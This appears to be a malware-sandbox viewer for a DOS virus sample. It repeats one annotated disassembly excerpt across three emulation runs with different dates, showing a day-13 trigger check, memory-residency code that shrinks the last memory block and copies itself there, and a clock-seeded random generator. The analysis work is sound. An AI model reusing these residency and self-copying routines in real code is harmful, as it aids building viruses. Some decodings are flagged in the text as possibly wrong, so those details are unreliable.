Sample viewer

vx.netlux.org/Virus.DOS.Virogen.Pinworm.2780


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:19:28.682573539Z 250 PC: 12fba | UNKNOWN!
; Code that runs after the DOS "Get date" call (op 42 = INT 21h AH=2Ah; day of month returns in DL).
; Visible effect: set a flag on day 13, then shrink a memory block by 0x180 paragraphs and copy
; code from CS:BP into the segment that the shrink exposes.
; NOTE(review): the MCB/PSP reading below assumes ES still holds the PSP segment and BP the code's
; base offset; neither register is loaded inside this snippet, so confirm against the preceding code.
2018-12-17T22:19:28.683989765Z 42 PC: 12fc2 | Get date 0x12fc2: cmp dl, 0xd    ; day of month == 13?
0x12fc5: jne 0x12fcd                          ; no: leave the flag untouched
0x12fc7: mov byte ptr cs:[bp + 0x8d0], 1      ; yes: set the byte flag at cs:[bp+0x8d0]
0x12fcd: mov ax, es
0x12fcf: dec ax
0x12fd0: mov ds, ax                           ; DS = ES - 1, one paragraph below ES (the block's MCB if ES = PSP)
0x12fd2: cmp byte ptr [0], 0x5a               ; byte 0 == 'Z' (0x5A), the DOS marker for the last block in the chain
0x12fd7: jne 0x1301e                          ; not the last block: skip to 0x1301e (outside this snippet)
0x12fd9: sub word ptr [3], 0x180              ; word at DS:3 (MCB size in paragraphs) -= 0x180, i.e. 6144 bytes
0x12fdf: sub word ptr [0x12], 0x180           ; word at DS:0x12 (= PSP:2, top-of-memory segment) -= 0x180
0x12fe5: mov es, word ptr [0x12]              ; ES = lowered top-of-memory value, the copy destination segment
0x12fe9: push cs
0x12fea: pop ds                               ; DS = CS
0x12feb: mov si, bp                           ; source offset = BP
0x12fed: mov cx, 0x4fc                        ; element count = 0x4FC (1276)
0x12ff0: xor di, di                           ; destination offset = 0
; NOTE(review): the next instruction is 2 bytes long (0x12ff2-0x12ff3), which leaves no room for an
; operand-size prefix; in 16-bit code that would be a word move (2552 bytes) rather than the dword
; move shown (5104 bytes) — confirm against the raw bytes before relying on the copy length.
0x12ff2: rep movsd dword ptr es:[di], dword ptr [si]    ; copy CX elements from CS:BP to ES:0
0x12ff4: xor ax, ax
0x12ff6: mov ds, ax                           ; DS = 0000h, the segment of the real-mode interrupt vector table
0x12ff8: push ds                              ; snippet ends here; what the pushed 0 is used for is not visible
; Analyst note: the 0x180 paragraphs removed above are no longer covered by the block's size field,
; so a later walk of the MCB chain would presumably report less memory than before — a residency indicator.
; Code that runs after the DOS "Get time" call (op 44 = INT 21h AH=2Ch; DX returns seconds in DH,
; hundredths in DL). The clock value seeds a 16-bit linear congruential generator kept at DS:0x8d6;
; the routine at 0x1347b advances it and scales the result to the caller's bound.
; Analyst note: because the seed comes from the clock, generator output differs between runs unless
; the emulated time is pinned.
2018-12-17T22:19:28.687641855Z 44 PC: 13475 | Get time 0x13475: mov word ptr [0x8d6], dx    ; seed = DX from the clock
0x13479: pop ax                               ; restores an AX pushed before this snippet (push not visible)
0x1347a: ret
; 0x1347b follows a ret and appears to be a separate entry point: in AX = bound, out DX, AX/CX clobbered.
0x1347b: push ax                              ; keep the caller's bound
0x1347c: mov ax, word ptr [0x8d6]             ; load the current state
0x1347f: mov cx, 0x7ab5
0x13482: mul cx                               ; DX:AX = state * 0x7AB5
0x13484: add ax, 0x3619                       ; low word + 0x3619
0x13487: mov word ptr [0x8d6], ax             ; state = (state * 0x7AB5 + 0x3619) mod 2^16
0x1348a: pop cx                               ; CX = caller's bound
0x1348b: mul cx                               ; DX = high word of state * bound, a value in 0..bound-1
0x1348d: cmp dx, 0
0x13490: jne 0x13493
0x13492: inc dx                               ; never return 0: a 0 result becomes 1
0x13493: ret
; NOTE(review): the five one-byte "instructions" below encode as 43 48 4B 4C 49, ASCII "CHKLI".
; They follow a ret and look like the start of a string (data) decoded as code — confirm against
; the raw bytes; the listing stops before the rest of it.
0x13494: inc bx
0x13495: dec ax
0x13496: dec bx
0x13497: dec sp
0x13498: dec cx

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3359,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:48:58.504695628Z 250 PC: 12fba | UNKNOWN!
; Code that runs after the DOS "Get date" call (op 42 = INT 21h AH=2Ah; day of month returns in DL).
; Visible effect: set a flag on day 13, then shrink a memory block by 0x180 paragraphs and copy
; code from CS:BP into the segment that the shrink exposes.
; NOTE(review): the MCB/PSP reading below assumes ES still holds the PSP segment and BP the code's
; base offset; neither register is loaded inside this snippet, so confirm against the preceding code.
2018-12-25T11:48:58.506027614Z 42 PC: 12fc2 | Get date 0x12fc2: cmp dl, 0xd    ; day of month == 13?
0x12fc5: jne 0x12fcd                          ; no: leave the flag untouched
0x12fc7: mov byte ptr cs:[bp + 0x8d0], 1      ; yes: set the byte flag at cs:[bp+0x8d0]
0x12fcd: mov ax, es
0x12fcf: dec ax
0x12fd0: mov ds, ax                           ; DS = ES - 1, one paragraph below ES (the block's MCB if ES = PSP)
0x12fd2: cmp byte ptr [0], 0x5a               ; byte 0 == 'Z' (0x5A), the DOS marker for the last block in the chain
0x12fd7: jne 0x1301e                          ; not the last block: skip to 0x1301e (outside this snippet)
0x12fd9: sub word ptr [3], 0x180              ; word at DS:3 (MCB size in paragraphs) -= 0x180, i.e. 6144 bytes
0x12fdf: sub word ptr [0x12], 0x180           ; word at DS:0x12 (= PSP:2, top-of-memory segment) -= 0x180
0x12fe5: mov es, word ptr [0x12]              ; ES = lowered top-of-memory value, the copy destination segment
0x12fe9: push cs
0x12fea: pop ds                               ; DS = CS
0x12feb: mov si, bp                           ; source offset = BP
0x12fed: mov cx, 0x4fc                        ; element count = 0x4FC (1276)
0x12ff0: xor di, di                           ; destination offset = 0
; NOTE(review): the next instruction is 2 bytes long (0x12ff2-0x12ff3), which leaves no room for an
; operand-size prefix; in 16-bit code that would be a word move (2552 bytes) rather than the dword
; move shown (5104 bytes) — confirm against the raw bytes before relying on the copy length.
0x12ff2: rep movsd dword ptr es:[di], dword ptr [si]    ; copy CX elements from CS:BP to ES:0
0x12ff4: xor ax, ax
0x12ff6: mov ds, ax                           ; DS = 0000h, the segment of the real-mode interrupt vector table
0x12ff8: push ds                              ; snippet ends here; what the pushed 0 is used for is not visible
; Analyst note: the 0x180 paragraphs removed above are no longer covered by the block's size field,
; so a later walk of the MCB chain would presumably report less memory than before — a residency indicator.
; Code that runs after the DOS "Get time" call (op 44 = INT 21h AH=2Ch; DX returns seconds in DH,
; hundredths in DL). The clock value seeds a 16-bit linear congruential generator kept at DS:0x8d6;
; the routine at 0x1347b advances it and scales the result to the caller's bound.
; Analyst note: because the seed comes from the clock, generator output differs between runs unless
; the emulated time is pinned.
2018-12-25T11:48:58.508185422Z 44 PC: 13475 | Get time 0x13475: mov word ptr [0x8d6], dx    ; seed = DX from the clock
0x13479: pop ax                               ; restores an AX pushed before this snippet (push not visible)
0x1347a: ret
; 0x1347b follows a ret and appears to be a separate entry point: in AX = bound, out DX, AX/CX clobbered.
0x1347b: push ax                              ; keep the caller's bound
0x1347c: mov ax, word ptr [0x8d6]             ; load the current state
0x1347f: mov cx, 0x7ab5
0x13482: mul cx                               ; DX:AX = state * 0x7AB5
0x13484: add ax, 0x3619                       ; low word + 0x3619
0x13487: mov word ptr [0x8d6], ax             ; state = (state * 0x7AB5 + 0x3619) mod 2^16
0x1348a: pop cx                               ; CX = caller's bound
0x1348b: mul cx                               ; DX = high word of state * bound, a value in 0..bound-1
0x1348d: cmp dx, 0
0x13490: jne 0x13493
0x13492: inc dx                               ; never return 0: a 0 result becomes 1
0x13493: ret
; NOTE(review): the five one-byte "instructions" below encode as 43 48 4B 4C 49, ASCII "CHKLI".
; They follow a ret and look like the start of a string (data) decoded as code — confirm against
; the raw bytes; the listing stops before the rest of it.
0x13494: inc bx
0x13495: dec ax
0x13496: dec bx
0x13497: dec sp
0x13498: dec cx

{"DateBased":true,"Day":13,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3359,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:48:58.617271299Z 250 PC: 12fba | UNKNOWN!
; Code that runs after the DOS "Get date" call (op 42 = INT 21h AH=2Ah; day of month returns in DL).
; Visible effect: set a flag on day 13, then shrink a memory block by 0x180 paragraphs and copy
; code from CS:BP into the segment that the shrink exposes.
; NOTE(review): the MCB/PSP reading below assumes ES still holds the PSP segment and BP the code's
; base offset; neither register is loaded inside this snippet, so confirm against the preceding code.
2018-12-25T11:48:58.619182414Z 42 PC: 12fc2 | Get date 0x12fc2: cmp dl, 0xd    ; day of month == 13?
0x12fc5: jne 0x12fcd                          ; no: leave the flag untouched
0x12fc7: mov byte ptr cs:[bp + 0x8d0], 1      ; yes: set the byte flag at cs:[bp+0x8d0]
0x12fcd: mov ax, es
0x12fcf: dec ax
0x12fd0: mov ds, ax                           ; DS = ES - 1, one paragraph below ES (the block's MCB if ES = PSP)
0x12fd2: cmp byte ptr [0], 0x5a               ; byte 0 == 'Z' (0x5A), the DOS marker for the last block in the chain
0x12fd7: jne 0x1301e                          ; not the last block: skip to 0x1301e (outside this snippet)
0x12fd9: sub word ptr [3], 0x180              ; word at DS:3 (MCB size in paragraphs) -= 0x180, i.e. 6144 bytes
0x12fdf: sub word ptr [0x12], 0x180           ; word at DS:0x12 (= PSP:2, top-of-memory segment) -= 0x180
0x12fe5: mov es, word ptr [0x12]              ; ES = lowered top-of-memory value, the copy destination segment
0x12fe9: push cs
0x12fea: pop ds                               ; DS = CS
0x12feb: mov si, bp                           ; source offset = BP
0x12fed: mov cx, 0x4fc                        ; element count = 0x4FC (1276)
0x12ff0: xor di, di                           ; destination offset = 0
; NOTE(review): the next instruction is 2 bytes long (0x12ff2-0x12ff3), which leaves no room for an
; operand-size prefix; in 16-bit code that would be a word move (2552 bytes) rather than the dword
; move shown (5104 bytes) — confirm against the raw bytes before relying on the copy length.
0x12ff2: rep movsd dword ptr es:[di], dword ptr [si]    ; copy CX elements from CS:BP to ES:0
0x12ff4: xor ax, ax
0x12ff6: mov ds, ax                           ; DS = 0000h, the segment of the real-mode interrupt vector table
0x12ff8: push ds                              ; snippet ends here; what the pushed 0 is used for is not visible
; Analyst note: the 0x180 paragraphs removed above are no longer covered by the block's size field,
; so a later walk of the MCB chain would presumably report less memory than before — a residency indicator.
; Code that runs after the DOS "Get time" call (op 44 = INT 21h AH=2Ch; DX returns seconds in DH,
; hundredths in DL). The clock value seeds a 16-bit linear congruential generator kept at DS:0x8d6;
; the routine at 0x1347b advances it and scales the result to the caller's bound.
; Analyst note: because the seed comes from the clock, generator output differs between runs unless
; the emulated time is pinned.
2018-12-25T11:48:58.621622603Z 44 PC: 13475 | Get time 0x13475: mov word ptr [0x8d6], dx    ; seed = DX from the clock
0x13479: pop ax                               ; restores an AX pushed before this snippet (push not visible)
0x1347a: ret
; 0x1347b follows a ret and appears to be a separate entry point: in AX = bound, out DX, AX/CX clobbered.
0x1347b: push ax                              ; keep the caller's bound
0x1347c: mov ax, word ptr [0x8d6]             ; load the current state
0x1347f: mov cx, 0x7ab5
0x13482: mul cx                               ; DX:AX = state * 0x7AB5
0x13484: add ax, 0x3619                       ; low word + 0x3619
0x13487: mov word ptr [0x8d6], ax             ; state = (state * 0x7AB5 + 0x3619) mod 2^16
0x1348a: pop cx                               ; CX = caller's bound
0x1348b: mul cx                               ; DX = high word of state * bound, a value in 0..bound-1
0x1348d: cmp dx, 0
0x13490: jne 0x13493
0x13492: inc dx                               ; never return 0: a 0 result becomes 1
0x13493: ret
; NOTE(review): the five one-byte "instructions" below encode as 43 48 4B 4C 49, ASCII "CHKLI".
; They follow a ret and look like the start of a string (data) decoded as code — confirm against
; the raw bytes; the listing stops before the rest of it.
0x13494: inc bx
0x13495: dec ax
0x13496: dec bx
0x13497: dec sp
0x13498: dec cx